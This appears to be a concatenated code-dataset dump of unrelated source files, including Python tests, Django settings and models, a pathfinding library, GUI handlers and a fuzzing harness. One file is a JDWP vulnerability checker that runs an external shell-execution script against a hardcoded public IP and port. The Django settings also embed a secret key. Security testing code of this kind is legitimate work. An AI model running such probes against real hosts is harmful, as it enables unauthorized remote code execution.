self.assertEquals(len(self.game.squares_with_pieces_of_color(TeamColor.silver)),
len(self.game.squares_with_pieces_of_color(TeamColor.red)))
def test_red_wins_classic(self):
self.game.apply_move(Move(MoveType.move, Position(0, 3), Position(0, 2)))
self.game.apply_move(Move(MoveType.move, Position(3, 2), Position(5, 2)))
self.game.apply_laser(TeamColor.silver)
self.assertEquals(self.game.winner, TeamColor.red)
def simple_silver_win(self):
pass
def test_same_number_moves(self):
red_moves = self.game.get_available_moves(TeamColor.red)
silver_moves = self.game.get_available_moves(TeamColor.silver)
self.assertEquals(len(red_moves), len(silver_moves))
| mit | 1,106,180,224,603,944,700 | 41.774194 | 89 | 0.643477 | false | 2.963128 | true | false | false |
takeshineshiro/heat | heat/common/timeutils.py | 1 | 2831 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utilities for handling ISO 8601 duration format.
"""
import datetime
import random
import re
import time
from heat.common.i18n import _
iso_duration_re = re.compile(r'PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?$')
wallclock = time.time
class Duration(object):
'''
Note that we don't attempt to handle leap seconds or large clock
jumps here. The latter are assumed to be rare and the former
negligible in the context of the timeout. Time zone adjustments,
Daylight Savings and the like *are* handled. PEP 418 adds a proper
monotonic clock, but only in Python 3.3.
'''
def __init__(self, timeout=0):
self._endtime = wallclock() + timeout
def expired(self):
return wallclock() > self._endtime
def endtime(self):
return self._endtime
def parse_isoduration(duration):
"""
Convert duration in ISO 8601 format to second(s).
Year, Month, Week, and Day designators are not supported.
Example: 'PT12H30M5S'
"""
result = iso_duration_re.match(duration)
if not result:
raise ValueError(_('Only ISO 8601 duration format of the form '
'PT#H#M#S is supported.'))
t = 0
t += (3600 * int(result.group(1))) if result.group(1) else 0
t += (60 * int(result.group(2))) if result.group(2) else 0
t += int(result.group(3)) if result.group(3) else 0
return t
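# Worked example: parse_isoduration('PT12H30M5S')
#   -> 12 * 3600 + 30 * 60 + 5 = 45005 seconds.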
def retry_backoff_delay(attempt, scale_factor=1.0, jitter_max=0.0):
"""
Calculate an exponential backoff delay with jitter.
    Delay is calculated as
    (2^attempt * scale_factor) + (uniform random from [0,1) * jitter_max)
:param attempt: The count of the current retry attempt
:param scale_factor: Multiplier to scale the exponential delay by
:param jitter_max: Maximum of random seconds to add to the delay
    :returns: The number of seconds to wait before the next retry attempt
"""
exp = float(2 ** attempt) * float(scale_factor)
if jitter_max == 0.0:
return exp
return exp + random.random() * jitter_max
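# Worked example: retry_backoff_delay(attempt=3, scale_factor=1.0, jitter_max=0.5)
#   -> 2**3 * 1.0 = 8.0 plus a uniform random jitter in [0, 0.5).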
def round_to_seconds(dt):
"""Round a datetime to the nearest second."""
rounding = 0
if dt.microsecond >= 500000:
rounding = 1
return dt + datetime.timedelta(0, rounding,
-dt.microsecond)
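# Worked example: round_to_seconds(datetime.datetime(2017, 1, 1, 0, 0, 0, 600000))
#   -> datetime.datetime(2017, 1, 1, 0, 0, 1), since 600000 us rounds up.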
| apache-2.0 | -6,785,138,763,645,567,000 | 29.771739 | 78 | 0.655245 | false | 3.759628 | false | false | false |
bsilverthorn/qy | src/qy/test/test_language.py | 1 | 8791 | """
@author: Bryan Silverthorn <[email protected]>
"""
import math
import numpy
import qy
from nose.tools import (
assert_true,
assert_false,
assert_equal,
assert_raises,
assert_almost_equal,
)
from qy import (
emit_and_execute,
Object,
)
def test_qy_python_no_arguments():
"""
Test the python() LLVM construct without arguments.
"""
executed = [False]
@emit_and_execute()
def _():
@qy.python()
def _():
executed[0] = [True]
assert_true(executed[0])
def test_qy_python_arguments():
"""
Test the python() LLVM construct with arguments.
"""
values = []
@emit_and_execute()
def _():
@qy.for_(8)
def _(i):
@qy.python(i)
def _(j):
values.append(j)
assert_equal(values, range(8))
def test_qy_python_exception():
"""
Test exception handling in the python() LLVM construct.
"""
class ExpectedException(Exception):
pass
def should_raise():
@emit_and_execute()
def _():
@qy.python()
def _():
raise ExpectedException()
assert_raises(ExpectedException, should_raise)
def test_qy_python_exception_short_circuiting():
"""
Test short-circuiting of exceptions in the python() LLVM construct.
"""
class ExpectedException(Exception):
pass
def should_raise():
@emit_and_execute()
def _():
@qy.python()
def _():
raise ExpectedException()
@qy.python()
def _():
assert_true(False, "control flow was not short-circuited")
assert_raises(ExpectedException, should_raise)
def test_qy_if_():
"""
Test the qy-LLVM if_() construct.
"""
bad = [True]
@emit_and_execute()
def _():
@qy.if_(True)
def _():
@qy.python()
def _():
del bad[:]
assert_false(bad)
@emit_and_execute()
def _():
@qy.if_(False)
def _():
@qy.python()
def _():
assert_true(False)
def test_qy_if_else():
"""
Test the qy-LLVM if_else() construct.
"""
bad = [True]
@emit_and_execute()
def _():
@qy.if_else(True)
def _(then):
if then:
@qy.python()
def _():
del bad[:]
else:
@qy.python()
def _():
assert_true(False)
assert_false(bad)
bad = [True]
@emit_and_execute()
def _():
@qy.if_else(False)
def _(then):
if then:
@qy.python()
def _():
assert_true(False)
else:
@qy.python()
def _():
del bad[:]
assert_false(bad)
def test_qy_for_():
"""
Test the qy-LLVM for_() loop construct.
"""
count = 128
iterations = [0]
@emit_and_execute()
def _():
@qy.for_(count)
def _(_):
@qy.python()
def _():
iterations[0] += 1
assert_equal(iterations[0], count)
def test_qy_break_():
"""
Test the qy break_() statement.
"""
count = 64
iterations = [0]
@emit_and_execute()
def _():
@qy.for_(count * 2)
def _(i):
@qy.python()
def _():
iterations[0] += 1
@qy.if_(i == count - 1)
def _():
qy.break_()
assert_equal(iterations[0], count)
def test_qy_object_basics():
"""
Test basic operations on LLVM-wrapped Python objects.
"""
result = [None]
text = "testing"
def do_function(string_py):
result[0] = string_py
@emit_and_execute()
def _():
do = Object.from_object(do_function)
string = Object.from_string(text)
do(string)
assert_equal(result, [text])
def test_qy_py_print():
"""
Test the py_print() LLVM construct with arguments.
"""
import sys
from cStringIO import StringIO
old_stdout = sys.stdout
try:
new_stdout = StringIO()
sys.stdout = new_stdout
@emit_and_execute()
def _():
qy.py_print("test text\n")
finally:
sys.stdout = old_stdout
assert_equal(new_stdout.getvalue(), "test text\n")
def test_qy_py_printf():
"""
Test the py_printf() LLVM construct with arguments.
"""
import sys
from cStringIO import StringIO
old_stdout = sys.stdout
try:
new_stdout = StringIO()
sys.stdout = new_stdout
@emit_and_execute()
def _():
@qy.for_(8)
def _(i):
qy.py_printf("i = %i\n", i)
finally:
sys.stdout = old_stdout
assert_equal(
new_stdout.getvalue(),
"".join("i = %i\n" % i for i in xrange(8)),
)
def test_qy_nested_for_():
"""
Test the qy-LLVM for_() loop construct, nested.
"""
count = 32
iterations = [0]
@emit_and_execute()
def _():
@qy.for_(count)
def _(_):
@qy.for_(count)
def _(_):
@qy.python()
def _():
iterations[0] += 1
assert_equal(iterations[0], count**2)
def test_qy_assert_():
"""
Test the qy-LLVM assert_() construct.
"""
# should not raise
@emit_and_execute()
def _():
qy.assert_(True)
# should raise
from qy import EmittedAssertionError
def should_raise():
@emit_and_execute()
def _():
qy.assert_(False)
assert_raises(EmittedAssertionError, should_raise)
def test_qy_random():
"""
Test the qy-LLVM random() construct.
"""
count = 4096
total = [0.0]
@emit_and_execute()
def _():
@qy.for_(count)
def _(_):
v = qy.random()
@qy.python(v)
def _(v_py):
total[0] += v_py
assert_almost_equal(total[0] / count, 0.5, places = 1)
def test_qy_random_int():
"""
Test the qy-LLVM random_int() construct.
"""
count = 32
values = []
@emit_and_execute()
def _():
@qy.for_(count)
def _(_):
v = qy.random_int(2)
@qy.python(v)
def _(v_py):
values.append(v_py)
assert_true(len(filter(None, values)) > 8)
assert_true(len(filter(None, values)) < 24)
def test_qy_select():
"""
    Test the select() LLVM construct.
"""
result = [None, None]
@emit_and_execute()
def _():
v0 = qy.select(True, 3, 4)
v1 = qy.select(False, 3, 4)
@qy.python(v0, v1)
def _(v0_py, v1_py):
result[0] = v0_py
result[1] = v1_py
assert_equal(result[0], 3)
assert_equal(result[1], 4)
def test_qy_is_nan():
"""
Test LLVM real-value is_nan property.
"""
@emit_and_execute()
def _():
a = qy.value_from_any(-0.000124992188151).is_nan
b = qy.value_from_any(numpy.nan).is_nan
@qy.python(a, b)
def _(a_py, b_py):
assert_false(a_py)
assert_true(b_py)
def test_qy_log():
"""
Test the LLVM log() intrinsic wrapper.
"""
@emit_and_execute()
def _():
v0 = qy.log(math.e)
@qy.python(v0)
def _(v0_py):
assert_equal(v0_py, 1.0)
def test_qy_log1p():
"""
Test the LLVM log1p() construct.
"""
@emit_and_execute()
def _():
v0 = qy.log1p(math.e - 1.0)
@qy.python(v0)
def _(v0_py):
assert_equal(v0_py, 1.0)
def test_qy_exp():
"""
Test the LLVM exp() intrinsic wrapper.
"""
@emit_and_execute()
def _():
v0 = qy.exp(1.0)
@qy.python(v0)
def _(v0_py):
assert_equal(v0_py, math.e)
def test_qy_real_neg():
"""
Test the floating-point negation operation.
"""
@emit_and_execute()
def _():
x = qy.value_from_any(3)
y = qy.value_from_any(-5)
@qy.python(-x, -y)
def _(a_py, b_py):
assert_equal(a_py, -3)
assert_equal(b_py, 5)
def test_qy_integer_mod():
"""
Test the integer modulo operation.
"""
@emit_and_execute()
def _():
x = qy.value_from_any(3)
y = qy.value_from_any(5)
z = qy.value_from_any(-2)
@qy.python(x % y, y % z, z % y)
def _(a_py, b_py, c_py):
assert_equal(a_py, 3)
assert_equal(b_py, 2)
assert_equal(c_py, -2)
| mit | 2,407,731,293,992,260,000 | 18.449115 | 74 | 0.475145 | false | 3.366909 | true | false | false |
blstream/ut-arena | ut_arena_py_api/ut_arena/settings.py | 1 | 3193 | """
Django settings for ut_arena_py_api project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!2stj*=!93mhvadu7moo(^ak6(jkl&(y*%q59l=7qj(5+n*-r)'
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'apps.utarena',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ut_arena.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ut_arena.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
# Rest settings
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'PAGE_SIZE': 10,
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
)
}
| apache-2.0 | 7,903,634,078,388,148,000 | 26.765217 | 91 | 0.68932 | false | 3.551724 | false | false | false |
brean/python-pathfinding | pathfinding/finder/finder.py | 1 | 6586 | # -*- coding: utf-8 -*-
import heapq  # used for the so-called "open list" that stores known nodes
import time # for time limitation
from pathfinding.core.util import SQRT2
from pathfinding.core.diagonal_movement import DiagonalMovement
# max. amount of tries we iterate until we abort the search
MAX_RUNS = float('inf')
# max. time after we until we abort the search (in seconds)
TIME_LIMIT = float('inf')
# used for backtrace of bi-directional A*
BY_START = 1
BY_END = 2
class ExecutionTimeException(Exception):
def __init__(self, message):
super(ExecutionTimeException, self).__init__(message)
class ExecutionRunsException(Exception):
def __init__(self, message):
super(ExecutionRunsException, self).__init__(message)
class Finder(object):
def __init__(self, heuristic=None, weight=1,
diagonal_movement=DiagonalMovement.never,
weighted=True,
time_limit=TIME_LIMIT,
max_runs=MAX_RUNS):
"""
find shortest path
:param heuristic: heuristic used to calculate distance of 2 points
(defaults to manhattan)
:param weight: weight for the edges
:param diagonal_movement: if diagonal movement is allowed
(see enum in diagonal_movement)
:param weighted: the algorithm supports weighted nodes
(should be True for A* and Dijkstra)
:param time_limit: max. runtime in seconds
:param max_runs: max. amount of tries until we abort the search
            (optional, only if we enter huge grids and have time constraints)
            <=0 means there are no constraints and the code might run on any
large map.
"""
self.time_limit = time_limit
self.max_runs = max_runs
self.weighted = weighted
self.diagonal_movement = diagonal_movement
self.weight = weight
self.heuristic = heuristic
def calc_cost(self, node_a, node_b):
"""
get the distance between current node and the neighbor (cost)
"""
if node_b.x - node_a.x == 0 or node_b.y - node_a.y == 0:
# direct neighbor - distance is 1
ng = 1
else:
# not a direct neighbor - diagonal movement
ng = SQRT2
# weight for weighted algorithms
if self.weighted:
ng *= node_b.weight
return node_a.g + ng
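    # Worked example: for a diagonal neighbour with weight 2 on a weighted
    # finder the returned cost is node_a.g + SQRT2 * 2; a direct neighbour
    # of weight 1 simply costs node_a.g + 1.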
def apply_heuristic(self, node_a, node_b, heuristic=None):
"""
helper function to apply heuristic
"""
if not heuristic:
heuristic = self.heuristic
return heuristic(
abs(node_a.x - node_b.x),
abs(node_a.y - node_b.y))
def find_neighbors(self, grid, node, diagonal_movement=None):
'''
        find neighbors, same for Dijkstra, A*, Bi-A*, IDA*
'''
if not diagonal_movement:
diagonal_movement = self.diagonal_movement
return grid.neighbors(node, diagonal_movement=diagonal_movement)
def keep_running(self):
"""
        check if we run into time or iteration constraints.
:returns: True if we keep running and False if we run into a constraint
"""
if self.runs >= self.max_runs:
raise ExecutionRunsException(
'{} run into barrier of {} iterations without '
'finding the destination'.format(
self.__class__.__name__, self.max_runs))
if time.time() - self.start_time >= self.time_limit:
raise ExecutionTimeException(
'{} took longer than {} seconds, aborting!'.format(
self.__class__.__name__, self.time_limit))
def process_node(self, node, parent, end, open_list, open_value=True):
'''
        we check if the given node is part of the path by calculating its
        cost and adding it to or removing it from our path
:param node: the node we like to test
(the neighbor in A* or jump-node in JumpPointSearch)
:param parent: the parent node (the current node we like to test)
:param end: the end point to calculate the cost of the path
:param open_list: the list that keeps track of our current path
:param open_value: needed if we like to set the open list to something
else than True (used for bi-directional algorithms)
'''
# calculate cost from current node (parent) to the next node (neighbor)
ng = self.calc_cost(parent, node)
if not node.opened or ng < node.g:
node.g = ng
node.h = node.h or \
self.apply_heuristic(node, end) * self.weight
# f is the estimated total cost from start to goal
node.f = node.g + node.h
node.parent = parent
if not node.opened:
heapq.heappush(open_list, node)
node.opened = open_value
else:
# the node can be reached with smaller cost.
# Since its f value has been updated, we have to
# update its position in the open list
open_list.remove(node)
heapq.heappush(open_list, node)
def check_neighbors(self, start, end, grid, open_list,
open_value=True, backtrace_by=None):
"""
find next path segment based on given node
(or return path if we found the end)
:param start: start node
:param end: end node
:param grid: grid that stores all possible steps/tiles as 2D-list
:param open_list: stores nodes that will be processed next
"""
raise NotImplementedError(
'Please implement check_neighbors in your finder')
def find_path(self, start, end, grid):
"""
find a path from start to end node on grid by iterating over
all neighbors of a node (see check_neighbors)
:param start: start node
:param end: end node
:param grid: grid that stores all possible steps/tiles as 2D-list
:return:
"""
self.start_time = time.time() # execution time limitation
self.runs = 0 # count number of iterations
start.opened = True
open_list = [start]
while len(open_list) > 0:
self.runs += 1
self.keep_running()
path = self.check_neighbors(start, end, grid, open_list)
if path:
return path, self.runs
# failed to find path
return [], self.runs
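# Illustrative usage sketch for a concrete subclass (Grid/AStarFinder live in
# other modules of this package; the matrix values are only an example):
#
#   from pathfinding.core.grid import Grid
#   from pathfinding.finder.a_star import AStarFinder
#
#   grid = Grid(matrix=[[1, 1, 1], [1, 0, 1], [1, 1, 1]])
#   finder = AStarFinder(diagonal_movement=DiagonalMovement.never)
#   path, runs = finder.find_path(grid.node(0, 0), grid.node(2, 2), grid)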
| mit | -7,266,928,208,447,150,000 | 35.588889 | 79 | 0.58928 | false | 4.23537 | false | false | false |
django-id/website | app_author/models.py | 1 | 2195 | from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
# CUSTOM FILE SIZE VALIDATOR
def validate_image(fieldfile_obj):
"""
Limit image size upload
"""
filesize = fieldfile_obj.file.size
megabyte_limit = 0.5
if filesize > megabyte_limit*1024*1024:
raise ValidationError("Max file size is %sMB" % str(megabyte_limit))
class Profile(models.Model):
"""
Author Model
"""
user = models.OneToOneField(
User,
on_delete=models.CASCADE
)
profile_picture = models.ImageField(
upload_to='images/%Y/%m/%d',
validators=[validate_image],
blank=True,
null=True
)
profile_name = models.CharField(
verbose_name='Name',
null=True,
blank=True,
max_length=50
)
profile_email = models.EmailField(
verbose_name='Email Address',
null=True,
blank=True
)
profile_location = models.CharField(
verbose_name='Origin/City',
null=True,
blank=True,
max_length=50
)
profile_github = models.URLField(
verbose_name='Github URL',
null=True,
blank=True
)
slug = models.SlugField()
is_created = models.DateTimeField(
null=True,
blank=True
)
is_moderator = models.BooleanField(
default=False,
)
def __str__(self):
return str(self.user)
def save(self, **kwargs):
if not self.slug:
from djangoid.utils import get_unique_slug
self.slug = get_unique_slug(instance=self, field='profile_name')
super(Profile, self).save(**kwargs)
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
"""
    Automatically create a Profile when a new User is created
"""
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
"""
    Automatically save the related Profile whenever the User is saved
"""
instance.profile.save()
| mit | -1,107,724,903,978,328,600 | 21.397959 | 76 | 0.618223 | false | 3.933692 | false | false | false |
mhl/mysociety-cvs | sitestats/pylib/sitestats/backports/contrib/auth/middleware.py | 1 | 2933 | from django.contrib import auth
from django.core.exceptions import ImproperlyConfigured
class RemoteUserMiddleware(object):
"""
Middleware for utilizing web-server-provided authentication.
If request.user is not authenticated, then this middleware attempts to
authenticate the username passed in the ``REMOTE_USER`` request header.
If authentication is successful, the user is automatically logged in to
persist the user in the session.
The header used is configurable and defaults to ``REMOTE_USER``. Subclass
this class and change the ``header`` attribute if you need to use a
different header.
"""
# Name of request header to grab username from. This will be the key as
# used in the request.META dictionary, i.e. the normalization of headers to
# all uppercase and the addition of "HTTP_" prefix apply.
header = "REMOTE_USER"
def process_request(self, request):
# AuthenticationMiddleware is required so that request.user exists.
if not hasattr(request, 'user'):
raise ImproperlyConfigured(
"The Django remote user auth middleware requires the"
" authentication middleware to be installed. Edit your"
" MIDDLEWARE_CLASSES setting to insert"
" 'django.contrib.auth.middleware.AuthenticationMiddleware'"
" before the RemoteUserMiddleware class.")
try:
username = request.META[self.header]
except KeyError:
# If specified header doesn't exist then return (leaving
# request.user set to AnonymousUser by the
# AuthenticationMiddleware).
return
# If the user is already authenticated and that user is the user we are
# getting passed in the headers, then the correct user is already
# persisted in the session and we don't need to continue.
if request.user.is_authenticated():
if request.user.username == self.clean_username(username, request):
return
# We are seeing this user for the first time in this session, attempt
# to authenticate the user.
user = auth.authenticate(remote_user=username)
if user:
# User is valid. Set request.user and persist user in the session
# by logging the user in.
request.user = user
auth.login(request, user)
def clean_username(self, username, request):
"""
Allows the backend to clean the username, if the backend defines a
clean_username method.
"""
backend_str = request.session[auth.BACKEND_SESSION_KEY]
backend = auth.load_backend(backend_str)
try:
username = backend.clean_username(username)
except AttributeError: # Backend has no clean_username method.
pass
return username
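# Illustrative sketch of the subclassing pattern described in the class
# docstring (the header name below is an assumption, not part of this file):
#
#   class CustomHeaderRemoteUserMiddleware(RemoteUserMiddleware):
#       header = 'HTTP_X_PROXY_REMOTE_USER'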
| agpl-3.0 | -5,813,389,405,922,956,000 | 42.776119 | 79 | 0.650869 | false | 5.030875 | false | false | false |
perfidia/seleshot | doc/gen_api.py | 1 | 3756 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import os
import sys
import string
sys.path.append('../src')
import seleshot
TEMPLATE = """===
API
===
"""
OUTPUT = os.path.join("_static", "api.txt")
# from http://legacy.python.org/dev/peps/pep-0257/
def trim(docstring):
if not docstring:
return ''
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxint
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxint:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return '\n'.join(trimmed)
def fmt(doc, indent = 8):
return "\n".join([" " * indent + i for i in trim(doc).split("\n")])
if __name__ == '__main__':
print "Generating...",
s = seleshot.create()
s.driver.get("http://example.com")
i = s.get_screen()
fd = open(OUTPUT, "w")
###########################################################################
fd.write(TEMPLATE)
fd.write(" " * 0 + ".. autofunction:: seleshot.create")
fd.write("\n\n")
fd.write(" " * 0 + ".. class:: ScreenShot(object):")
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: get_screen(self, url = None):\n\n")
fd.write(fmt(s.get_screen.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: close(self):\n\n")
fd.write(fmt(s.close.__doc__))
fd.write("\n\n")
fd.write(" " * 0 + ".. class:: ImageContainer(object):\n\n")
fd.write(fmt(i.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: cut_element(self, id = None, xpath = None):\n\n")
fd.write(fmt(i.cut_element.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: cut_area(self, x = 0, y = 0, height = None, width = None):\n\n")
fd.write(fmt(i.cut_area.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: draw_dot(self, id = None, xpath = None, coordinates = None, padding = 0, color = None, size = None):\n\n")
fd.write(fmt(i.draw_dot.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: draw_frame(self, id = None, xpath = None, coordinates = None, padding = None, color = None, size = None):\n\n")
fd.write(fmt(i.draw_frame.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: draw_image(self, id = None, xpath = None, coordinates = None, position = Position.MIDDLE, padding = (0, 0), filename = None, image = None):\n\n")
fd.write(fmt(i.draw_image.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: draw_zoom(self, id = None, xpath = None, coordinates = None, position = Position.MIDDLE, padding = (0, 0), zoom = None):\n\n")
fd.write(fmt(i.draw_zoom.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: draw_blur(self, id = None, xpath = None):\n\n")
fd.write(fmt(i.draw_blur.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: save(self, filename):\n\n")
fd.write(fmt(i.save.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: is_cut(self):\n\n")
fd.write(fmt(i.is_cut.__doc__))
fd.write("\n\n")
##########################################################################
fd.close()
s.close()
print "done"
| mit | 3,779,118,023,028,133,400 | 28.809524 | 183 | 0.536741 | false | 3.224034 | false | false | false |
nanshihui/PocCollect | component/JDWP/JDWPvul.py | 1 | 2106 | #!/usr/bin/env python
# encoding: utf-8
from t import T
import os
import platform
import subprocess
import signal
import time
import requests,urllib2,json,urlparse
class TimeoutError(Exception):
pass
def command(cmd, timeout=60):
"""Run command and return the output
cmd - the command to run
timeout - max seconds to wait for
"""
is_linux = platform.system() == 'Linux'
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None)
if timeout==0:
return p.stdout.read()
t_beginning = time.time()
seconds_passed = 0
while True:
if p.poll() is not None:
break
seconds_passed = time.time() - t_beginning
if timeout and seconds_passed > timeout:
if is_linux:
os.killpg(p.pid, signal.SIGTERM)
else:
p.terminate()
raise TimeoutError(cmd, timeout)
time.sleep(0.1)
return p.stdout.read()
class P(T):
def __init__(self):
T.__init__(self)
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
result = {}
result['result']=False
usecommand='python '+os.path.split(os.path.realpath(__file__))[0]+'/script/jdwpshellifier.py -t '+ip+' -p '+port
try:
print usecommand
msgresult = command(usecommand, timeout=40)
print msgresult
if 'Command successfully executed' in msgresult:
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='Java Debug Wire Protocol vul'
result['VerifyInfo']['URL'] =ip+':'+port
result['VerifyInfo']['payload']='Java Debug Wire Protocol poc'
result['VerifyInfo']['result'] =msgresult
else:
pass
        except Exception, e:
            print e
finally:
return result
if __name__ == '__main__':
print P().verify(ip='120.24.243.216',port='8001')
| mit | -8,082,791,348,985,507,000 | 31.4 | 135 | 0.57265 | false | 4.05 | false | false | false |
glmcdona/meddle | examples/example_deviceiocontrol/processes.py | 1 | 1377 | from process_base import *
from targets import *
import subprocess
import os
class ProcessDeviceIo(ProcessBase):
def __init__(self, Controller, crashdump_folder, breakpoint_handler, pid, ph, unique_identifier, verbose, logger):
# Specific options
self.path_to_exe = b"C:\\Windows\\System32\\notepad.exe"
self.command_line = b"notepad.exe"
self.logger = logger
# Initialize
self.initialize(Controller, self.__class__.__name__, crashdump_folder, breakpoint_handler, pid, ph, unique_identifier, verbose)
def on_debugger_attached(self, Engine):
# Set the types
self.Engine = Engine
self.types = meddle_types(Engine)
# Add the targets
Engine.AddTarget(Target_Handles)
Engine.AddTarget(Target_DeviceIoControl)
# Handle process loaded
Engine.HandleProcessLoaded()
# Start an auto-it script
try:
subprocess.Popen(['autoit3.exe', os.path.join(os.path.dirname(__file__), "..", "autoit", "notepad_print.au3"), str(self.pid), ">nul"], shell=True)
except:
print "Warning: autoit3.exe not found on path. Please install it and add it to path to increase the attack surface."
# Resume the process that we created suspended. This is called just after the debugger has been attached.
if self.start_th >= 0:
windll.kernel32.ResumeThread(self.start_th);
def log_csv(self, fields):
self.logger.log_event(fields)
| mit | 4,168,101,267,918,378,500 | 28.319149 | 149 | 0.713145 | false | 3.326087 | false | false | false |
building39/nebula2 | scripts/cdmi_explorer/CDMIMain/handlers.py | 1 | 2951 | '''
Created on Jun 9, 2013
@author: mmartin
'''
import sys
from gi.repository import Gtk
from CDMIAbout import CDMIAbout
from CDMIConnect import CDMIConnect
from CDMIHelp import CDMIHelp
class Handlers(object):
'''
classdocs
'''
def __init__(self, session):
self.session = session
def onAbout(self, *args):
CDMIAbout(self.session)
def onConnect(self, *args):
CDMIConnect(self.session)
def onDeleteWindow(self, *args):
self.onQuit(*args)
def onHelp(self, *args):
CDMIHelp(self.session)
def onQuit(self, *args):
Gtk.main_quit()
def onCDMIRowCollapsed(self, *args):
treeview = args[0]
treeiter = args[1]
treepath = args[2]
model = treeview.get_model()
data = self.session.GET(model[treeiter][1])
self.session.get_children(treeview, treepath, data)
self.session.display_cdmi_data(data)
def onCDMIRowExpanded(self, *args):
treeview = args[0]
treeiter = args[1]
treepath = args[2]
rowname = self._squash_slashes(self.session.cdmimodel.get_value(treeiter, 1))
data = self.session.GET(rowname)
treeiter = self.session.cdmimodel.get_iter(treepath)
model = treeview.get_model()
prefix = rowname
if model.iter_has_child(treeiter):
num_children = model.iter_n_children(treeiter)
for i in range(num_children):
if not data:
break
child = data['children'][i]
childpath = self._squash_slashes('%s/%s' % (prefix, child))
childdata = self.session.GET(childpath)
childiter = model.iter_nth_child(treeiter, i)
self.session.get_children(treeview,
model.get_path(childiter),
childdata)
self.session.display_cdmi_data(data)
return
def onCDMIRowActivated(self, *args):
'''
Display the CDMI data for the selected row.
'''
treeview = args[0]
treepath = args[1]
_column = args[2]
model = treeview.get_model()
treeiter = model.get_iter(treepath)
data = self.session.GET(model[treeiter][1])
self.session.get_children(treeview, treepath, data)
self.session.display_cdmi_data(data)
def onSelectCursorRow(self, *args):
print 'onSelectCursorRow args: %s' % args
sys.stdout.flush()
def onCursorChanged(self, *args):
print 'onCursorChanged args: %s' % args
sys.stdout.flush()
def _squash_slashes(self, S):
T = ""
for i in range(len(S)):
try:
if S[i] == '/' and S[i+1] == '/':
i += 1
